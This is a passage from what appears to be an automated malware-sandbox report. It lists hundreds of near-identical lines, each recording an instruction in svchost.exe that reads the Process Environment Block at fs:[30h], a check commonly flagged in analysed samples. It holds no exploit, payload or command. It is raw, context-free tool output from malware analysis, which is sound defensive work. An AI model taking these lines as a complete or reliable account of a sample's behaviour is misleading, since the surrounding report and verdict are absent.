                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330634F mov eax, dword ptr fs:[00000030h]2_2_0330634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]2_2_0330625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]2_2_033062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h]2_2_032280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
